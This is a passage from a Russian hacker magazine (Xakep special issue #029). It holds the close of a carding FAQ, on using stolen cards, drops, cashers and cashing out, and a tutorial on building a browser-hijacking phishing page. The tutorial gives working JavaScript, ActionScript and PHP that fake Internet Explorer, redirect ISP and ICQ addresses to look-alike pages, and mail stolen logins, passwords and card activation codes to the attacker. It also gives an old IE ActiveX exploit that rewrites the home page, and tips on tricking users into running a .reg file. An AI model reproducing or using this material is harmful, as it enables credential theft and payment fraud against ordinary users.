Эти сервисы являются посредниками между покупателем и продавцом. Что-то типа гарант-сервиса. То есть покупатель отсылает им деньгу, продавец отсылает покупателю товар, если товар дошел, то ЭС отсылает деньгу продавцу. Тут можно выступить двумя способами: мы - ЭС или мы - покупатель и продавец одновременно, но выдаемся за разных людей. Просек? Для тех, кто в танке, объясняю. В первом случае мы ваяем ЭС и рассказываем, что лучше воспользоваться нашим сервисом, потому что мы самые надежные и у нас самый низкие проценты в размере 0,0000001% :). При этом нужно, чтобы на твой сервер заходило не 2 кинутых чела и твой друг, а нормальный траф. Его тоже можно купить или сделать самому.

Во втором же случае мы прикидываемся покупателем, вбиваем креду, потом через несколько дней перевоплощаемся в продавца и говорим, что товар дошел. И ЭС высылает тебе деньгу.

В каких шопах отовариваться?

Для того чтобы с пользой потратить креду, тебе нужно найти такие шопы (если ты выбрал этот вариант), которые бы выслали товар по пертой креде. Ищутся они тупым перебором. То есть заходишь на какой-нибудь поисковик или сайт, где висят списки шопов. Заказываешь в одном несколько товаров, в другом несколько (от двух до четырех) и т.д. И смотришь, какие шопы выслали, какие нет. Причем при каждом заказе ты должен расходовать следующие вещи: одну проксю, одно мыло, одну карту. После того как ты составил список из десяти шопов, считай себя героем.

Как мне работать с магазином?

Вот ты пришел, выбрал себе товар, и вылетела форма, которую надо заполнить, чтоб его выслали. Объясняю некоторые основные поля, которые могу встретиться:

Billing Address. Здесь ты указываешь инфу о кардхолдере. То есть то, что указано в файле с кредой. Телефон от балды или дроповский, мыло твое.

Shipping Address. Куда тебе вышлют товар. Здесь - адрес дропа. Телефон его же или от балды, или вечно занятый (есть и такие). Имя тоже дроповское или кардхолдеровское. Правда, когда придет курьер, то могут возникнуть проблемы: "Нам нужен именно Гейтс, а вы Аллен!". Тогда дроп может сказать, что он педераст... тьфу, передаст.


Спецвыпуск Xakep, номер #029, стр. 029-014-5, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-5

Account Info. Это тебе предлагают создать аккаунт, чтоб ты мог видеть, как идет обработка твоего заказа. Вещь полезная!

И как я могу контролировать обработку моего заказа?

Очень просто. Есть такая темя, как Order Info. Скорее всего, она будет видна на твоем аккаунте в магазине. Там тебе сообщат, на каком этапе сейчас находится твой заказ. Этапы такие: Pending, Processing и т.д. - это значит, твой заказ обрабатывают, то есть нАливают твою креду, проверяют и т.д. Если процесс затянулся (скажем, недели на 2-3), значит вряд ли статус поменяется. Статус Canceled означает, что заказ отменили. Обычно указывают причину. Decline - креда сдохла или чего-то пошло не так. Shipped, OK, Accepted - выслали или вышлют! Бывают и другие, но это ты поймешь.

Что такое tracking number?

Значит когда твой заказ выслали, они сделали это через курьерскую службу или почту (USPS). Помнишь, в Изгое, с Томом Хэнксом, он там был директором или менеджером FedEx'a. Вот это и есть курьерская служба. Их много существует (UPS, AirBorne etc). Ну так вот, tracking number есть номер посылки в этих системах. У FedEx он состоит из 12 знаков, у AirBorne - на 1 больше, у UPS - 1Z *** *** ** **** ** *. С его помощью ты можешь узнать, где находится твоя посылка, зайдя на страницу этих служб.

Как мне получить бобы с креды?

Хе! Вопрос встречается везде среди новичков. Значит, получать бобы на кардерском языке значит "налить" (не налить в стакан, а от слова наличные ;), "обналивать" и т.д. Налить ты можешь разными способами: дроп продает товар и высылает тебе деньги, ты продаешь товар и т.д. Есть также специальные люди.

Кто такой "нальщик"/"обнальщик"?

Это вот тот специальный чел, который поможет тебе получить бабло. Нальщики НЕ НАЛЯТ КРЕДЫ! То есть для этого тебе надо будет предварительно куда-нибудь вбить креду. Также, если ты работаешь на аукционах, то, соответственно, не принимаешь креды и наложенные платежи и не встречаешься с покупателем. Скорее всего нальщики будут работать с вайерами, Western Union и проплаченными чеками.

Ты обговариваешь с ним вид приема перевода, свежесть дропа и т.д. И начинаешь говорить о процентах. Не пытайся выбить меньше 40-50 процентов (и тебе о-о-очень крупно повезет, если на 50 процентах сойдешься). Ему в этом смысла никакого нет. Не втирай ему, что деньги чистые, так как на хрен ты тогда вообще стучишься? И, потом, не стоит стучаться к нему, каждый час спрашивая, дошел ли чек/деньги и т.д. Тебе сами скажут. Рассчитывай на 5-8 дней.

Ну а как я сам могу налить?

Ищешь в Инете народ, живущий в Америке, говорящий по-русски. Искать можешь через ICQ White Pages или через Одиго. Когда нашел хороший список, шлешь им просьбу помочь с обналом денег. И народ соглашается. Не весь, конечно, но попадаются. Дальше ты к нему присматриваешься, обговариваешь процент (не жлобись, потом аукнется) и т.д. Естественно, кидал тоже до фига попадается, так что надо отослать тестовые чеки, money order, вайеры или с чем ты там работаешь... Ну вот, собственно, и все. Ждешь, когда попадется хороший народ.


Спецвыпуск Xakep, номер #029, стр. 029-014-6, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-6

Есть также фирмы, помогающие обналить вайеры, чеки и т.д. Вот бежишь на altavista.com или yahoo.com и search! Чем быстрее фирма ответит тебе на твой мэил, тем она лучше. Здесь кидал поменьше, но тоже есть. Так что снова тестовые чеки...

Ну и сам можешь найти способ обнала или дропов. Все зависит только от тебя.

Э-э-э, ты тут сыпал термином вайер. Это что такое?

WIRE - это банковский перевод на счет. Очень удобная фишка.

А что такое money orders (cahier checks)?

MO (cahier checks) - это что-то типа обыкновенного бумажного чека, но уже заранее оплаченного.

Расскажи поподробнее про аукционы.

Рассказываю. Хорошо, если у тебя на твоем акке много положительных отзывов (фидбеков). Количество положительных отзывов прямо пропорционально твоему успеху. Потом ты должен неплохо владеть фиглишем, чтоб общнуться с покупателем по мылу, после завершения торгов.

Способами вывода денег с аукционов являются MO или Cahier Checks, так как все остальные способы (вайеры, персональные чеки, BidPay) легко стопануть (т.е. сделать money back). А так покупатель оплачивает их заранее, и их практически не стопают.

Старайся не напрягать своего покупателя, чтоб он не волновался о своем чеке как можно дольше. Это поможет спокойно получить чек и обналичить его. И напоследок выбирай дропа или байера так, чтобы они были как можно дальше друг от друга. Некоторые экстремалы любят приезжать за товарами лично.

Что такое чек?

Я уже упоминал в ответах слова "чеки", "чек". Чек - это самый долгий, но самый дешевый способ оплаты, т.к. банки берут очень низкие проценты за их обналичку. Чеки бывают разные: валютные, рублевые, корпоративные, именные, дорожные.

Как их налить?

Кроме дорожных чеков, ты не можешь расплатиться ими в магазине. Для того чтобы получить за них деньги, тебе придется принести их в банк. Там их возьмут на инкассо (то есть пошлют запрос в банк, откуда он пришел, подождут ответ (пару недель), далее тебе отдадут наличку с вычетом всех налогов). Проценты разные. За дорожные чеки возьмут мизер (1%-5%), а вот за именные до 22 процентов опустить могут. Можно также обналичить их через конторы, например, www.paycard2000.com.

Какие есть достоинства и недостатки чеков?

Чеки, которые выписаны на чье-то имя (физическое лицо), тебе придется налить очень долго (от недели до нескольких месяцев), плюс придется заполнять до фига бумаг, что тоже не есть гуд. Дорожные чеки налят моментально. К недостаткам можно отнести лишь то, что не каждый банк их возьмет, хотя их (хороших банков) гораздо больше, чем тех, которые принимают чеки на физическое лицо.

Как мне перевести деньги с СС на WM?

Этот вопрос я специально оставил на закуску. Как известно, первое и последнее запоминается лучше всего. Отвечаю: НИКАК! Н-И-К-А-К! Еще раз: НИКАК! Усвоил? Не существует прямой схемы СС->WM.

После прочтения этого ФАКа я стану кардером?

Нет, нет и еще раз нет. Не вздумай бежать по форумам и орать на них, что ты кардер и все знаешь. Этот ФАК призван только помочь тебе на первых порах. Хотя лучше зарабатывать деньги никого не грабя.


Спецвыпуск Xakep, номер #029, стр. 029-014-7, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-7

(Для Людей_в_Сером_и_Синем) Зачем ты написал этот ФАК?

Специально для вас, чтоб вам было легче найти плохих дядек. Для администрации магазинов, банков, чтобы улучшили свои системы безопасности. Для покупателей, чтобы были осторожнее.

А на самом деле его написал не я, а генератор бреда. С Новым годом, пошел на фиг!


Спецвыпуск Xakep, номер #029, стр. 029-020-1, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-1

Родил идею, взрыл bugtraq и нашел эксплоит DonoR (donor@real.xakep.ru);

Разобрал эксплоит на составляющие и заставил осла подавиться своим дерьмом Dronich (dronich@real.xakep.ru);

В тяжких муках закодил и задизигнил "паразита" Sevranty (sevranty@deepdesign.ru, vsevolod.deepdesign.ru).

Привет необузданный и великий ALL. Пришла весна, уже тает снег и всплывает г@вно. На улицу надо выходить только за пивом, иначе есть шанс вступить во что-нибудь. А у меня болит голова, и лезут в мою голову совершенно мрачные мысли. Вот и дошла до моей больной головы, идея Donor'а сделать ЭТО. И ЭТО родилось...

ТЕМ, КТО ПИШЕТ ПИСЬМА:

Если ты отсканировал и распознал эту статью, но ошибся хоть в одном знаке, то ничего работать у тебя не будет! Поэтому не ленись, лезь в инет и скачивай все коды с описаниями, так ты избегнешь глупых ошибок своего ДНК. Это, как знает любой, даже самый последний ламер, не лечится. Для подводников поясню, перенос строки в JavaScript строго регламентирован и описывается правилами, при верстке кода, который мы приводим в статье, мы можем потерять часть форматирования. Поэтому или учи правила или лезь на сайт за образцом.

ИДЕЯ

Сидел как-то мистер Донор на своей хм-м-м... заднице и размышлял о том, какая, все же, замечательная вещь эти современные сетевые технологии, особенно, в умелых руках: многострадального осла можно по косточкам разобрать и обратно собрать, да так, что бедный юзер умом тронется, а на флэше вообще можно целые он-лайн тулзы мутить! Мысли, как застебать лопоухих ламеров, одна прикольнее другой теснились в башке. Это ж как же все ламоботы свято уверены, что в родном ишаке можно только поп-апы стремные открывать, а с любимыми менюхами и с панелькой с кнопочками ничего случиться не может. Авотфиг! Такой полезный стереотип-с надо использовать! Например, можно заменить все стандартные контролзы, панельки и скролл-бары флэшовыми мувиками и рандомом запускать веселые эффекты. Типа, алерт: "Твой браузер заразился корью!" и весь интерфейс покрывается красными точками :). Или, "Хлебни кислоты, сосунок!" и вся морда обтекает и плавится. Мыслям было тесно, и Донор полез в сеть искать Ноа, чтобы срочняком поделиться во избежание овердоза.

Мастер Ноа подошел к проблеме с сугубо утилитарной точки зрения: это ж НЛП чистой воды, наивного юзера можно так запугать и задурить, что он сам, добровольно скачает и установит себе, что угодно, и отдаст тебе любую инфу.

Тут Донор вспомнил, что когда-то давно, когда он был совсем маленьким и глупым, он как-то залез на один порно-сайт и подцепил себе паразита - вместо хоумпаги к нему начала грузиться какая-то платная порнуха. Он потом это дело затрахался из реестра вычищать.

Сложив два и два и получив пять, Ноа и Донор пришли к выводу, что если закодить пагу-паразит, эмитирующую контролзы браузера, и подсадить ее юзеру вместо хомяка, то можно незаметно перехватить контроль над его машиной и получить ценную инфу, а если разместить такую пагу на крупном портале, то получится что-то вроде боевого DNS.

У ВАС ЕСТЬ ПЛАН, МИСТЕР ФИКС?


Спецвыпуск Xakep, номер #029, стр. 029-020-2, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-2

У меня есть три плана! (с) Итак, что же нужно сделать, чтобы натянуть наивного юзера по самые гланды?

1. Заманить юзверя на зло-пагу, где подсадить ему означенного паразита. Сделать это можно сотней грязных способов от спама, до кидания ссылки в популярную конфу - выбирай на вкус.

2. Прописать юзеру в хоупейдж линк на пагу-паразит aka военный DNS.

3. Показать юзеру неудачную загрузку его реального хомяка или about:blank. Еще неплохая идея сымитировать загрузку сайта M$ (осел иногда самолично вытворяет такое паскудство).

4. Подменить реальные контролзы фейковыми.

5. Отловить адреса, вводимые юзверем в адресную строку, сравнить их со списком "интересных" урлов, таких, как адреса известных провайдеров, icq.com, крупных @-магазинов и т.д., и если такой попался, выдать поддельную страницу соответствующей конторы, а если нет, то отправить юзверя по адресу.

6. На поддельной странице заставить юзера ввести представляющие интересе конфиденциальные данные, типа, логин и пасс, код активации интернет-карты и т.д.

7. Сохранить полученные данные и слить себе на мыло.

8. Окончательно задурить юзеру голову, чтобы выиграть время.

Итак, начнем с реализации паразита, чтобы было, чего подсаживать.

ПОДМЕНА ДОМАШНЕЙ СТРАНИЦЫ

В соурсе (view source) нашей паги должен быть такой код. Он откроет наш псевдо-эксплорер. Тот, кто читал предыдущие номера, сразу поймет, что при минимальном изменении можно открыть этот эксплорер во весь экран, добавив пользователю неожиданного счастья в отсутствии альтернативы.

<html>

<script>

var windowW = 830 // wide

var windowH = 640 // high

var windowX = 0 // from left

var windowY = 0 // from top

var urlPop = "rol.htm"

var title = "- "

var autoclose = false

s = "width="+windowW+",height="+windowH;

var beIE = document.all?true:false

function openFrameless(){

if (beIE){

NFW = window.open("","popFrameless",""+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

NFW.moveTo(windowX,windowY)

var frameString=""+

"<html>"+

"<head>"+

"<title>"+title+"</title>"+

"</head>"+

"<frameset rows='28,*,21' framespacing=0 border=0 frameborder=0>"+

"<frame name='top' src='top.html' scrolling='no'>"+

"<frame name='main' src='"+urlPop+"' scrolling=yes>"+

"<frame name='bottom' src='bottom.html' scrolling='no'>"+

"</frameset>"+

"</html>"

NFW.document.open();

NFW.document.write(frameString)

NFW.document.close()

} else {

NFW=window.open(urlPop,"popFrameless","scrollbars,"+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

NFW.moveTo(windowX,windowY)

}

NFW.focus()

if (autoclose){

window.onunload = function(){NFW.close()}

}

}

</script>

<body onload="javascript:openFrameless();">

Здесь можно пустить море твоего бреда или излияние твоего больного сознания, но лучшим вариантом будет стандартная 404 ошибка. У нее меньше всего шансов вызвать подозрение пользователя.

</body>

<html>

Ну, и конечно код окончания нашей паги. Теперь у нас при старте браузера появляется новое окно, в котором мы можем отрываться по полной. С чего начинается Родина? С темплейта в моей голове. Чтобы творить непотребство, надо заставить пользователя поверить, что он еще пользуется своим милым осликом ИЕшкой. Сначала, мы эмулируем окно браузера - нарисуем псевдо-эксплорер, в котором все и будет происходить. Для этого сделаем его скриншот, обрежем лишнее и сверстаем в HTML страничку (для ленивых: все это можно скачать с сайта). Получили совершенно нефункциональное НЕ4ТО. Нефункциональное потому, что пользователю некуда вводить свои любимые урлы, которые мы должны подменить. Куда бы мы ни тыкнули, ничего не происходит. ЭТИМ даже дедушку не обмануть. Начнем-ка мы ЭТО развивать. Самое главное - это строка ввода адреса. Наша задача заключается в том, чтобы на запрос определенного адреса в инете, пользователь попал на нашу обманку и не понял об этом. Для этого самым простым и быстрым способом является сделать аналог этой адресной строки на Флеше (альтернативным вариантом является попытка утонуть в тонкостях JS & CSS).


Спецвыпуск Xakep, номер #029, стр. 029-020-3, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-3

Внутри флешки рисуем текстовое поле в стиле строки ввода адреса эксплорера, вешаем кнопочку, которая будет ловить нажатие ентера и обрабатывать значение нашего текстового поля в момент нажатия. Для этого на кнопке должен висеть, например, такой код:

on (release, keyPress "<Enter>") {

url01 = 'www.rol.ru';

url02 = 'rol.ru';

url03 = 'http://www.rol.ru';

url04 = 'http://www.rol.ru/';

url05 = 'http://rol.ru';

url06 = 'http://rol.ru/';

url11 = 'www.icq.com';

url12 = 'icq.com';

url13 = 'http://www.icq.com';

url14 = 'http://www.icq.com/';

url15 = 'http://icq.com';

url16 = 'http://icq.com/';

url17 = 'web.icq.com';

url18 = 'http://web.icq.com';

url19 = 'http://web.icq.com/';

url21 = 'voffice.rol.ru';

url22 = 'http://voffice.rol.ru';

url23 = 'http://voffice.rol.ru/';

t = text;

if ( url01 == t || url02 == t || url03 == t || url04 == t || url05 == t || url06 == t ) {

t = 'http://sevranty.deepdesign.ru/xakep/a-004/rol.htm';

} else if ( url11 == t || url12 == t || url13 == t || url14 == t || url15 == t || url16 == t || url17 == t || url18 == t || url19 == t ) {

t = 'http://sevranty.deepdesign.ru/xakep/a-004/icq.htm';

} else if ( url21 == t || url22 == t || url23 == t ) {

t = 'http://sevranty.deepdesign.ru/xakep/a-004/login.php';

} else {

t = 'http://www.google.com.ru/search?hl=ru&inlang=ru&ie=windows-1251&q=' + t;

}

getURL(t, "main");

}

Длина кода зависит только от количества серваков, которые ты хочешь подменять.

Все написано до извращения просто. В начале скриптика описываем адреса, которые мы хотим подменить (нужно помнить, что у одного адреса есть несколько вариантов написания, а аналог grep'а здесь может быть не лучшим выходом.). После этого присваиваем переменной t значение нашего текстового поля, которое мы предварительно обозвали text. Дальше как всегда извращенным if'ом, сравниваем введенное юзером с образцами урлов, описанных выше - мы не ищем легких путей. Кстати, обращаю внимание, что у нас из фрейма с именем top (top.html) передается обработанный урл (валуя "t") в средний фрейм main (по дефолту rol.htm), это делается getURL(t, "main"), и потом не говорите, что не поняли.


Спецвыпуск Xakep, номер #029, стр. 029-020-4, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-4

Теперь у нас есть локальное счастье. И это локальное счастье мы вставляем в файл top.html - это верхняя часть нарезанного эксплорера.

<td width="100%" align="left" nowrap valign="top"><img src="gui/0.gif" width="1" height="3" hspace=0 vspace=0><br><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="450" HEIGHT="18" id="index" ALIGN=""><PARAM NAME=movie VALUE="flash/index.swf?5"><PARAM NAME=quality VALUE=high><PARAM NAME=bgcolor VALUE=#FFFFFF><EMBED src="flash/index.swf?5" quality=high bgcolor=#FFFFFF WIDTH="450" HEIGHT="18" NAME="index" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED></OBJECT></td>

Я специально здесь привел пример, как вставляется код АктивИкса флеша в таблицу, а то многие из начинающих вставляют пробелы или переносы строки - ГДЕ НЕ НАДО. Если не понимаешь, то лучше слушай старших или читай ФАК с МАНУАЛьной терапией для МОЗГофф. А то при твоем умении, все таблицы расползутся вкривь и вкось. Самореклама: подтверждено несколькими годами верстки html'я в блокноте. Хе-хе. О... забыл пояснить: в файле top.html у нас находиться строка ввода урла (адреса), с кусками от скриншота браузера. В файле bottom.html строка статуса индикатор инета и тому подобная муть.

Чтобы совсем запутать юзера можно реализовать на флэше рабочие кнопки и выпадающий список при вводе урла в фейковую адресную строку, настраиваемые через XML. Но если лень, можно не разворачивать браузер на фулскрин, а оставить часть родных контролзов, правда, шанс успеха тогда падает.

ЧТО БЫ ТАКОЕ ПОКАЗАТЬ?

На данном этапе мы имеем: почти полноценный браузер, в котором нам нечего показать. Для того чтобы все-таки что-то показывать, мы должны понять, чего мы хотим от того ламера, который попадет в наши сети. Я хочу от него личный логин/пароль к РОЛ'овскому диалапу и, конечно, активационный код новой карточки, который он введет в поле для пополнения СВОЕГО (читать МОЕГО) баланса. Еще я хочу от него логин/пароль к его АСЬКЕ (но это для понту). Поэтому продолжим наш МОЗГовой штурм. Теперь, когда МЫ все это поняли и оценили трудности, нам надо несколько страниц обманок, функциональность бэк-офиса РОЛа и скрипты, которые все эту белиберду обработают. В этом вопросе проще всего реализовать всякие проверки и отправки на мыло через php. Сразу скажу, если твой хостер имеет тебя в плане сендмейла или дерет непотребно в плане прав, то я могу тебе только посочувствовать. Конечно, говорят, что на халяву и уксус сладкий, но мы то уксус не пьем в принципе. Только пшеничный франциСКАНЕР с кальМАРчиКАми, бЕЙлиС с чипСАМИ или сухой ЧИНзаНО под моченые яБЛОЧКИ.

Чтобы сделать паги-обманки, нам нужен все тот же, наш любимый и ненаглядный продукт мега-корпорации русских засл(R)анцев мелкомягких, ОСЛИК ИЕ! Скачиваем полностью все станицы с картинками, ручками в тот отстой, который сделал осел, ПЕРЕвставляем каскадные таблицы стилей (ну он имеет по полной программе). Дальше исправляем в css пути в бэкграунду и ручками скачиваем данные бэкграунды (их осел игнорирует, замечено в версии 5.0 при скачивании c web.icq.com). Также ручками исправляем ошибки осла с ифреймами, рекламой, различными аквив-иксами и счетчиками. Для РОЛа мне пришлось сделать 4етыре обманки. Первая это главная страница (на ней я исправил адрес в Личный кабинет). Вторая - запрос логина/пароля, вместо апач-авторизации у РОЛа. Третья - сам Личный кабинет РОЛовчанина. Четвертая ввод кода активации РОЛовской карточки. В некоторые эти страницы я вставил php'шки которые обрабатывают определенные валуи, чтобы весь этот мозго-шит смотрелся правдоподобно.


Спецвыпуск Xakep, номер #029, стр. 029-020-5, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-5

Дальше можно перейти ко всяким отправкам личной инфы ламера к нам на мыло. При клике на ссылку на Личный кабинет с обманки РОЛа или наборе в адесной строке одного из этих адресов voffice.rol.ru http://voffice.rol.ru http://voffice.rol.ru/ Из личного кабинера на РОЛе наш милый и любимый (Лу)юзер должен перенаправиться на нашу пагу-обманку login.php, на ней псевдо-апач-авторизация (copyright на оба эти слова. Шекспир). Пользователь вводит свои тайные логин/пароль. При клике на любой кнопке, инфа передается методом пост нашему скриптику post.php

<table width=90% height=90% border=0 cellspacing=0 cellpadding=0><form method=post action=post.php><tr>

Опустим избыточный код.

<input type=text size=12 maxlength=60 name=n1 style="font-family: Arial; font-size: 12px; width:200; height:20px;">

Снова опустим избыточный код.

<input type=password size=12 maxlength=60 name=n2 style="font-family: Arial; font-size: 12px; width:200; height:20px;">

Опять опустим избыточный код.

<INPUT type="checkbox" name="Order" value="DSN"> Save this password in your password list

И еще раз опустим избыточный код.

<input type=submit name=do value='Ok' style="width:90"> <input type=submit name=do value='Cancel' style="width:90"><br>

Ну, и опустим избыточный код

</tr></form></table>

Кстати, опять обрати внимание, как верстается открывающий и закрывающие тэги ФОРМЫ, это важно при желании избежать излишних пробелов. При нажатии передали инфу и скрипт заработал:

<?

$timeall = 'Date: '.Date( 'D, d M Y H:i:s ').$SIGN.sprintf( '%02d%02d',floor($ZONE/3600),floor(($ZONE%3600)/60)). "\n";

$msg .= $timeall;

$msg .= "REMOTE_ADDR: $REMOTE_ADDR\n";

$host = gethostbyaddr("$REMOTE_ADDR");

$msg .= "HOST: $host\n";

$msg .= "$n1\n";

$msg .= "$n2\n";

$msg .= " \n";

$msg .= "------------------------------------------\n";

$topic = "ROL: Login\Password";

$email="sex@sex.ru";

mail($email, $topic, $msg, "From: sex@sex.ru");

$goto = 'Location: '.'rvoffice.php'.'?userlogin='.$n1;

Header($goto);

?>

Этот скриптик передает необходимый минимум информации кроме логина и пароля. Я его уже описывал как-то на страницах журнала. Вместо sex@sex.ru должен быть твой e@mail, на него будет приходить "ценная" инфа. Скрипт после отправки мыла сразу переходит на пагу rvoffice.php и явным образом передает на нее переменную userlogin, это логин пользователя. С помощью этого логина, мы будем пытаться заставить пользователя поверить, что он в своем Личном кабинете. Для этого у нас по всему rvoffice.php разбросаны


Спецвыпуск Xakep, номер #029, стр. 029-020-6, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-6

<?php echo $userlogin; ?>

Они выводят введенный пользователем логин, где это необходимо. Например, в полях "Имя пользователя", "Перенаправление почты", "Персональный номер" и т.п. Забыл уточнить, что я для примера брал страницу РОЛа, которая заблокированна и поэтому надо пополнить баланс. Почти все важные ссылки на данной станице идут на пагу-скрипт addmoney.php, где пользователю предлагают пополнить баланс.

<?

if ($csid=="" or $cert1=="" or $cert1=="" or $cert3=="" or $cert4=="") {}

else {

$timeall = 'Date: '.Date( 'D, d M Y H:i:s ').$SIGN.sprintf( '%02d%02d',floor($ZONE/3600),floor(($ZONE%3600)/60)). "\n";

$msg = $csid." - ".$cert1." - ".$cert1." - ".$cert3." - ".$cert4." \n";

$msg .= $timeall;

$msg .= "REMOTE_ADDR: $REMOTE_ADDR\n"; $host = gethostbyaddr("$REMOTE_ADDR");

$msg .= "HOST: $host\n";

$topic = "ROL: Card number.";

$email="sex@sex.ru";

mail($email, $topic, $msg, "From: sex@sex.ru");

}

?>

В начале скрипта идет проверка заполнены ли поля активирующие карточку, если да, то они отсылаются тебе на мыло с дополнительной информацией, время, IP'шник, хост.

<HTML>

<HEAD><TITLE>Russia-On-Line Internet card</TITLE></HEAD>

<BODY>

<h1 align=center>Пополнение баланса</h1>

<b>Только для клиентов РОЛ.</b><br>

Для пополнения баланса введите код активации Интернет-карты и нажмите кнопку "Пополнить баланс". Ваш баланс будет пополнен в соответствии с номиналом Интернет-карты.

<p>

<font color="maroon"><b>ВНИМАНИЕ:</b></font>

Некоторые серии Интернет-карт не могут быть использованы для пополнения баланса<br>

<font color="maroon"><b>ВНИМАНИЕ:</b></font>

При пополнении баланса автоматического перевода на другой тарифный план не происходит; для изменения тарифного плана см. Личный кабинет

После стандартного оформления данной РОЛовской страницы идет наша форма, которая ссылается сама на себя.

Не пустая, а равная main, переменная УИД ($uid=="main") показывает нам, что это не переход со страницы rvoffice.php, а клик на кнопке 'Пополнить баланс'.

<form method=post action=addmoney.php>

<? if ($csid=="" or $cert1=="" or $cert1=="" or $cert3=="" or $cert4=="") {

if ($uid=="main") { ?><h2 align=center><font color=f01010>Не указан код активации Интернет карты.<br>Пожалуйста, введите код активации.</font></h2><?

} }

Если хоть какие-то поля не заполнены, то мы ругаемся на пользователя стандартной фразой, взятой с РОЛа. Здесь у нас акцент делается на то, чтобы заставить пользователя поверить, что он на РОЛе.

else {

if ($uid=="main") {

?><h2 align=center><font color=f01010>Указан неверный код активации Интернет карты.<br>Пожалуйста, введите код активации заново.</font></h2><?

} } ?>

Если все поля заполнены кодом активации карточки, и это нажатие на кнопку 'Пополнить баланс', то код активации уже отослан нам в начале страницы, но мы все равно говорим пользователю, что он ошибся. Пусть думает, что его карточку заблокировали или он даун и т.п. Чем дольше он будет сомневаться в себе, тем лучше нам. Время в данном вопросе работает на нас.


Спецвыпуск Xakep, номер #029, стр. 029-020-7, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-7

<table border=0 width=100%><tr><td>Код активации</td><td><table><tr><td>

<input type=text size=10 maxlength=10 name=csid value=<?php echo $csid; ?>> - </td><td>

<table bgcolor=#A0A0A0><tr><td><INPUT name=uid type=hidden value=main>

<input type=text size=5 maxlength=5 name=cert1 value=<?php echo $cert1; ?>> - <input type=text size=5 maxlength=5 name=cert2 value=<?php echo $cert2; ?>> - <input type=text size=5 maxlength=5 name=cert3 value=<?php echo $cert3; ?>> - <input type=text size=5 maxlength=5 name=cert4 value=<?php echo $cert4; ?>> </td></tr></table></td></tr></table></td></tr>

</table><center><input type=submit name=do value='Пополнить баланс'>

</center></form>

Здесь идут те самые поля кода активации и субмит формы. В полях мы выводим текущие значения кода активации. Это мы делаем по двум прчинам: первая - так же сделано на РОЛе, вторая - так удобнее всем.

<CENTER><HR WIDTH=70% SIZE=5><BR>Copyright © 2002 TeleRoss</CENTER>

</BODY></HTML>

Здесь закрывается страница.

Ух! Вот и написал. ICQ делается по аналогии с login.php, только поля логина пароля вставляются в обманку главной страницы. Под каким-нибудь заголовком, типа "SUPER, PUPER, NEW, Web-ICQ".

ОСЕЛ 666 И ЕГО ДЫРЫ

Паразит был уже почти готов, когда всплыла одна маленькая деталь: нужно было как-то подсадить заразу.

Самой известной мазой прописаться без спроса в хомяк к юзеру является знаменитый баг четвертого IE. Следующий код позволял писать в реестр, что угодно, например, свой урл в хомяк:

<script>

document.write("<APPLET HIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function pipetz(){

try{

x=document.applets[0];

x.setCLSID("{F953DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

x.createInstance();

Shl=x.GetObject();

x.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

try{

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.pipets.ru");

}

catch(e){}

}

catch(e){}

}

setTimeout("pipetz()", 1000);

</script>

К сожалению или к счастью, этот баг был успешно пофиксен M$ начиная с IE 5.0, да и антивири успешно делают на этот скрипт свою стойку. Однако воткнуть этот скрипт в подсаживательную пагу, все же, не помешает, так как ламеров, не менявших свой софт со времен царя Гороха, на свете пока еще хоть отбавляй.

ИГРЫ С РЕЕСТРОМ

Вторая маза - это заставить юзверя самолично, своей ламерской рукой прописать себе в реестр нужные нам параметры aka адрес паразита. Ты в курсе, что стоит два раза шлепнуть по reg-файлу, как все его содержание автоматом добавится в реестр, что нам и надо. Юзеры часто пользуют reg-файлы, когда крячат проги. Подсунь ламеру такой файлик, как необходимые изменения для кряка нужной софтины. Сам кряк может быть фейком чистой воды.


Спецвыпуск Xakep, номер #029, стр. 029-020-8, ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

ВОЕННЫЙ HTTP’ОВЫЙ DNS - Берем контроль над браузером клиента

Спецвыпуск Xakep, номер #029, стр. 029-020-8

